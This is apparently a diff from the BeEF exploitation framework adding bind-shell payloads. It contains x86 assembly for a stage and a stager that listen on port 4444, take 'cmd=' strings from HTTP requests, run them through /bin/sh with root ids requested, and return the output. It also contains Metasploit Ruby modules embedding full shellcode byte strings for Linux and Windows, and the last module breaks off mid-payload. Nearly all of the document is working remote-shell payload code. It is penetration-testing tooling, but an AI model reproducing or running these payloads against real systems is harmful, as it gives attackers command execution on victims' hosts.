push 0x800 ;O_NONBLOCK
pop edx
push BYTE 0x37 ;sys_fcntl
pop eax
int 0x80
;allocate one page of memory
push BYTE 0x00 ;offset = 0
push 0xffffffff ;fd=-1
push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE
push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC
push 0x1000 ;allocated size
push 0x00 ;system determines location
mov ebx, esp ;ptr to argument array
push BYTE 0x5a
pop eax
int 0x80
mov edi, eax ;ptr to allocated memory
add esp, 0x18
doforever:
xor edx, edx
xor eax, eax
;initialize socket
push BYTE 0x01
pop ebx ;SYS_SOCKET
push eax ;proto = 0
inc eax
push eax ;SOCK_STREAM = 1
inc eax
push eax ;AF_INET = 2
mov ecx, esp ;ptr to argument array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
mov esi, eax ; save socket filedescriptor
add esp, 0x0C
;reuse socket
push BYTE 0x0E
pop ebx ;SYS_SETSOCKOPT
push BYTE 0x04 ;sizeof socklen_t
push esp ;address of socklen_t
push BYTE 0x02 ;SO_REUSEADDR = 2
push BYTE 0x01 ;SOL_SOCKET = 1
push esi ;socket fd
mov ecx, esp ;ptr to argument array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
add esp, 0x14
;bind socket to port
push BYTE 0x02
pop ebx ;SYS_BIND
push edx ;INADDR_ANY
push 0x5c110002 ;PORT 0x115c = 4444
mov ecx, esp ;ptr to server struct
push BYTE 0x10 ; addrlen
push ecx
push esi ;socketfd
mov ecx, esp ;ptr to argument array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
add esp, 0x14
inc ebx
inc ebx ;SYS_LISTEN
push ebx ;backlog
push esi ;socketfd
mov ecx, esp ;ptr to argument array
push BYTE 0x66
pop eax ; socketcall is syscall #102
int 0x80
add esp, 0x08
inc ebx ;SYS_ACCEPT
push edx ;socklen = 0
push edx ;sockaddr ptr = NULL
push esi ;sockfd
mov ecx, esp ;ptr to argumet array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
add esp, 0x0c
xchg esi, eax ;serversocket in eax and clientsocket handler in esi
xchg eax, ebx ;serversocket in ebx
mov eax, 0x06 ;close serversocket
int 0x80
mov ecx, 0x1000
firstzeromemory:
;zero out memory
dec ecx
mov ebx, edi
add ebx, ecx
mov BYTE [ebx], 0x00
jecxz readfromsocket
jmp firstzeromemory
readfromsocket:
;read from socket into memory
mov dx, 0x400 ;read 1024 bytes
mov ecx, edi ;ptr to allocated memory
mov ebx, esi ;clientsocket
push BYTE 0x03
pop eax ;sys_read
int 0x80
push edi ;ptr to allocate memory
push esi ;clientsocket
mov ebx, edi ;ptr to allocated memory
mov ecx, 0x400 ;search in 1024 bytes
search:
cmp DWORD [ebx], 0x3d646D63 ;compare with "cmd="
je found ;cmd= found
inc ebx
dec ecx
jecxz notfound ;cmd= not in recieved buffer
jmp search ;search some more
found:
mov ecx, ebx ;put ptr to memory where "cmd=" was found
add ecx, 0x03 ;skip "cmd"
mov ebx, [esp+0x14] ;write to pipe
sendcommand:
inc ecx ;first time skip "=", move to next byte
push BYTE 0x01 ;write one byte
pop edx
push BYTE 0x04 ;sys_write
pop eax
int 0x80
cmp BYTE [ecx], 0x0a ;LF character?
jne sendcommand ;else continue write to pipe
;sleep one second
push 0x00
push 0x01 ;one second
mov ebx, esp ;ptr to argument array
xor ecx, ecx ;NULL
mov eax, 0xA2 ;sys_nanosleep
int 0x80
add esp, 0x08 ;clean up stack
notfound:
call writehttpheaders
db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a ;HTTP/1.1 200 OK
db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a ;Content-Type: text/html
db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a ;Access-Control-Allow-Origin: *
db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a ;Content-Length: 3048
writehttpheaders:
pop esi ;source address saved by call
add edi, 0x400 ;ptr to memory skip 1024 bytes
mov ecx, 0x62 ;copy 98 bytes
rep movsb
pop edi ;restore clientsocket
pop esi ;restore ptr to memory
mov ebx, [esp] ;read from pipe
mov ecx, esi ;ptr to memory
add ecx, 0x400 ;skip 1024 bytes
add ecx, 0x62 ;skip header
push 0xB86 ;read max 2950 bytes
pop edx
push BYTE 0x03 ;sys_read
pop eax
int 0x80
mov ebx, edi ;clientsocket
mov ecx, esi ;ptr to memory
add ecx, 0x400 ;skip 1024 first bytes
mov edx, 0xbe8 ;send max 3048 bytes
push BYTE 0x04 ;sys_write
pop eax
int 0x80
;close clientsocket
push BYTE 0x06 ;sys_close
pop eax
int 0x80
mov edi, esi ;restore memory ptr into edi
jmp doforever
child:
mov ebx, [esp+0xC] ;close output side of pipe
push BYTE 0x06 ;sys_close
pop eax
int 0x80
xor ebx, ebx ;close stdin
push BYTE 0x06 ;sys_close
pop eax
int 0x80
mov ebx, [esp+0x8] ;dup input side to stdin
push BYTE 0x29 ;sys_dup
pop eax
int 0x80
mov ebx, [esp] ;close input side of other pipe
push BYTE 0x06
pop eax
int 0x80
xor ebx, ebx
inc ebx ;close stdout
push BYTE 0x06 ;sys_close
pop eax
int 0x80
mov ebx, [esp+0x4] ;dup output side to stdout
push BYTE 0x29 ;sys_dup
pop eax
int 0x80
;setresuid(0,0,0)
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 0xa4 ;sys_setresuid16
int 0x80
;execve("/bin//sh", 0, 0)
xor eax, eax
push eax
push eax
push 0x68732f2f ;//sh
push 0x6e69622f ;/bin
mov ebx, esp
push BYTE 0x0b ;sys_execve
pop eax
int 0x80

111
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm Normal file
View File

@@ -0,0 +1,111 @@
; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
; Browser Exploitation Framework (BeEF) - http://beefproject.com
; See the file 'doc/COPYING' for copying permission
BITS 32
SECTION .text
global _start
_start:
cld ;clear direction flag
xor eax, eax ;zero eax
xor edx, edx ;zero edx
;initialize socket
push BYTE 0x01
pop ebx ;SYS_SOCKET
push eax ; proto = 0
inc eax
push eax ;SOCK_STREAM = 1
inc eax
push eax ;AF_INET = 2
mov ecx, esp ; ptr to argument array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
mov esi, eax ;save socket filediscriptor
push BYTE 0x0E
pop ebx ;SYS_SETSOCKOPT
push BYTE 0x04 ;sizeof socklen_t
push esp ; address of socklen_t
push BYTE 0x02 ;SO_REUSEADDR = 2
push BYTE 0x01 ;SOL_SOCKET = 1
push esi ;socket fd
mov ecx, esp ;ptr to argument array
push BYTE 0x66
pop eax ; socketcall is syscall #102
int 0x80
;bind socket to port
push BYTE 0x02
pop ebx ;SYS_BIND
push edx ;INADDR_ANY
push 0x5c110002 ;PORT 0x115C = 4444
mov ecx, esp ;server struct
push BYTE 0x10 ;addrlen
push ecx
push esi ;socketfd
mov ecx, esp ; ptr to argument array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
inc ebx
inc ebx ;SYS_LISTEN
push ebx ;backlog
push esi ;socketfd
mov ecx, esp ;ptr to argument array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
inc ebx ;SYS_ACCEPT
push edx ;socklen = 0
push edx ;sockaddr ptr = NULL
push esi ;socketfd
mov ecx, esp ; ptr to argument array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
xchg esi, eax ;serversocket in eax and client socket handler into esi
xchg eax, ebx ;serversocket in ebx
mov eax, 0x6 ;close serversocket
int 0x80
push BYTE 0x00 ;offset =0
push 0xFFFFFFFF ;fd = -1
push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE
push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC
push 0x1000 ;allocated size
push BYTE 0x00 ;system determines location
mov ebx, esp ;ptr tot argument array
push BYTE 0x5a
pop eax ;MMAP call
int 0x80
mov edi, eax ;ptr to allocated memory
; read from socket into memory
mov dx, 0x1000 ;max bytes to read
mov ecx, edi ;pointer to memory
mov ebx, esi ;clientsocket
push BYTE 0x03
pop eax
int 0x80
push BYTE 0x06
pop eax ;close clientsocket
int 0x80
search:
cmp DWORD [edi], 0x3d646d63 ;compare with "cmd="
je short found ;jump if found
inc edi ;look some further
jmp short search
found:
push BYTE 0x04
pop eax
add edi, eax ;skip "cmd="
jmp edi ;jump to the staged shellcode

73
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb Normal file
View File

@@ -0,0 +1,73 @@
##
# $Id: beef_bind-handler.rb 121018 Ty Miller @ Threat Intelligence$
##
module Msf
module Handler
###
#
# This module implements the Bind TCP handler placeholder only.
#
###
module BeEFBind
include Msf::Handler
#
# Returns the handler specific string representation
#
def self.handler_type
return "beef_bind"
end
#
# Returns the connection oriented general handler type
#
def self.general_handler_type
"bind"
end
#
# Initializes a bind handler and adds the options common to all bind
# payloads, such as local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LPORT(4444),
#OptAddress.new('RHOST', [false, 'The target address', '']),
], Msf::Handler::BeEFBind)
end
#
# Placeholder only
#
def cleanup_handler
end
#
# Placeholder only
#
def add_handler(opts={})
# Start a new handler
start_handler
end
#
# Placeholder only
#
def start_handler
end
#
# Placeholder only
#
def stop_handler
end
end
end
end

85
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb Normal file
View File

@@ -0,0 +1,85 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Bart Leppens' ],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 165, 'n' ]
},
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" +
"\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" +
"\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" +
"\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" +
"\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" +
"\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" +
"\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" +
"\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" +
"\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" +
"\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" +
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" +
"\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" +
"\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" +
"\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" +
"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" +
"\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" +
"\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" +
"\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" +
"\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" +
"\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" +
"\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" +
"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" +
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" +
"\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" +
"\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" +
"\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
"\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" +
"\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" +
"\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" +
"\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" +
"\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" +
"\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" +
"\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" +
"\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" +
"\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" +
"\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" +
"\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" +
"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" +
"\xf6\x48\x31\xd2\x0f\x05"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

84
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb Normal file
View File

@@ -0,0 +1,84 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Bart Leppens' ],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 168, 'n' ]
},
'Payload' =>
"\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" +
"\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" +
"\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" +
"\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" +
"\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" +
"\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" +
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" +
"\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" +
"\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" +
"\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" +
"\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" +
"\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" +
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" +
"\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" +
"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" +
"\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" +
"\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" +
"\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" +
"\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" +
"\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" +
"\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" +
"\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" +
"\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" +
"\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" +
"\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" +
"\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" +
"\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" +
"\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" +
"\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" +
"\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" +
"\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" +
"\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" +
"\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" +
"\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" +
"\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" +
"\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" +
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

137
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb Normal file
View File

@@ -0,0 +1,137 @@
##
# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Windows
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Windows Command Shell Stage (stager)',
'Version' => '$Revision: 11421 $',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Ty Miller' ],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShellWindows,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 511, 'n' ]
},
'Payload' =>
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" +
"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" +
"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" +
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" +
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" +
"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" +
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" +
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" +
"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" +
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" +
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" +
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" +
"\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" +
"\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" +
"\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" +
"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" +
"\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" +
"\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" +
"\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" +
"\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" +
"\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" +
"\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" +
"\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" +
"\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" +
"\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" +
"\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" +
"\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
"\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" +
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" +
"\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" +
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" +
"\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" +
"\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" +
"\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" +
"\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" +
"\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" +
"\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" +
"\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" +
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" +
"\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" +
"\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" +
"\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" +
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" +
"\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" +
"\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" +
"\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" +
"\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" +
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" +
"\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" +
"\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" +
"\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" +
"\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" +
"\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
"\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" +
"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" +
"\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" +
"\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" +
"\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" +
"\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" +
"\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" +
"\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" +
"\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" +
"\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" +
"\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" +
"\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" +
"\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" +
"\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" +
"\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" +
"\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" +
"\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" +
"\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" +
"\xff\xd5\xe9\x58\xfe\xff\xff"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

49
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb Normal file
View File

@@ -0,0 +1,49 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Handler' => Msf::Handler::BeEFBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 54, 'n' ] },
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" +
"\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" +
"\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" +
"\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" +
"\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" +
"\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" +
"\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" +
"\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" +
